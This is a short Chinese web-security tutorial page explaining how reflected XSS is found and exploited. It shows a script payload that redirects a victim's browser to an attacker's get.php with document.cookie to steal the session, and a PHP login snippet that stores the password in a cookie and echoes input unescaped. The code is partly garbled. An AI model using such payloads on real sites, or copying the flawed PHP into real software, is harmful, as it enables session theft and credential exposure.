网站地图    收藏   

主页 > 后端 > 网站安全 >

浅谈xss的挖掘和利用 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 浅谈xss的挖掘和利用...

 马上我的论坛就要开放了,有点小激动!!,废话不多说了,看下文吧!!
 背景:XSS也是老生长谈的话题了,其危害性呢,大家都懂的,刚看到几个黑阔的反射型和储存型的争论,恰好小白的我觉得呢,浅谈一下XSS的挖掘和利用,有利于学习的氛围 !
 
XSS: Cross Site Spripting –
 -
 一般的攻击步骤:
 
1我们一般喜欢发送隐藏网站脚本的HTTP链接给目标:http://www.2cto.com /post.php?user=<script>document.location=”http://www.2cto.com /get.php?cookie=”+document.cookie;</script>
 1
 2:目标用户打开有xss漏洞的网站在登录期间打开了我们发送的隐藏跨站脚本的HTTP链接.
 
3:有xss的90se呢执行了这个http链接并且显示url参数user的值,这样跨站脚本就执行了.
 
4:跨站脚本将目标用户的浏览器地址专一到了我们的页面:http://www.2cto.com /get.php,目标用户浏览器的cookie数据被当作get.php网页的url参数cookie:http://www.2cto.com /get.php?cokie=document.cookie,从而让我们得到目标的cookie
 
简单挖掘:看下面代码
 if($match_count)
 { setcookie(“uername”,$_POST["username"],time()+30*24*60*60) //将username字段的值存入cookie
 setcookie(“uername”,$_POST["username"],time()+30*24*60*60) //将password字段的值存入cookie
 mysql_free_result($result);
 mysql_close($link);
 // 跳转页面
 header(“Location:http//localhost/balck/black.php?user=”
 $_POST["username"])//在使用者登陆后,将当前页面跳转到black.php,back.php文件有url参数user,user值是来访者的帐号
 }
 else
 {
 
header(“Location:http:// .$_SERVER["HTTP_HOST"]“
 $_SERVER["SCRIPT_NAME"]);

来自:90 sacret Team信息安全团队

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论